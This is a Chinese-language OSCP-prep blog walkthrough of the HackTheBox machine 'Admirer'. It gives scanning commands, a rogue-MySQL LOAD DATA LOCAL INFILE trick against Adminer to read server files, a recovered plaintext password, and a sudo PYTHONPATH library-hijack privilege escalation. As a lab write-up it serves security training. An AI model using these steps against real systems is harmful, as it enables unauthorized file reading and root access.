OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

Ethan医生5个月前靶场180

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.128.76 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.128.76 (扫描UDP)

image.png


gobuster dir -u http://10.129.128.76/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png

http://10.129.128.76//robots.txt


image.png

直接爆破下面路径

gobuster dir -u http://10.129.128.76/admin-dir/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html -t 50

image.png

gobuster dir -u http://10.129.128.76/admin-dir/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -t 50

image.png

http://10.129.128.76/admin-dir//contacts.txt

image.png

http://10.129.128.76/admin-dir/credentials.txt

image.png

连接FTP

image.png

都下载下来开始搜索有啥可用信息

image.png

image.png

gobuster dir -u http://10.129.128.76/utility-scripts/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html -t 50

image.png

http://10.129.128.76/utility-scripts//adminer.php

image.png

需要获取到数据库上的password,才能的到真实的waldo密码,


image.png

image.png

CREATE DATABASE admirer;

CREATE USER 'demo'@'%' IDENTIFIED BY 'demo_admirer';

GRANT ALL PRIVILEGES ON * . * TO 'demo'@'%';

FLUSH PRIVILEGES;

create table lez(data VARCHAR(255));

然后打开远程访问

vim /etc/mysql/mariadb.conf.d/50-server.cnf

systemctl restart mysql

image.png

改成0.0.0.0,然后在使用远程的机器进行访问

image.png

然就可以查看index.php

load data local infile '../index.php'

    into table admirer.lez

    fields terminated by '/n'

image.png

image.png


waldo, &<h5b~yK3F#{PaPB&dA}{H>

image.png


image.png

image.png

image.png

利用这py挡案

image.png


sudo PYTHONPATH=/tmp /opt/scripts/admin_tasks.sh 6

根据上面显示可以得出是加载模块shutil里面的函数make_archive 那么就可以利用此处新建一个shutil的python脚本文件然后加载函数make_archive再执行命令进行提权

相关python 库劫持可以参考:https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

image.png

image.png



3f851577a28a525b42596474270c7698

标签: OSCP

相关文章

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

OSCP备考_0x10_Vulnhub靶机_GoldenEye: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/goldeneye-1,240/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

OSCP备考_0x07_HackThBox靶机_Linux_​Solidstate

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.57.118 (扫描TCP)nmap -sU --top-ports 100 10.129.57....

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x09_HackThBox靶机_Linux_Poison

OSCP备考_0x09_HackThBox靶机_Linux_Poison

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.240.214 nmap -sU --top-ports 100 10.129.240....

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon10.129.227.77nmap -sCV -p- --min-rate 10000 -T4 -sS 10.1...

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。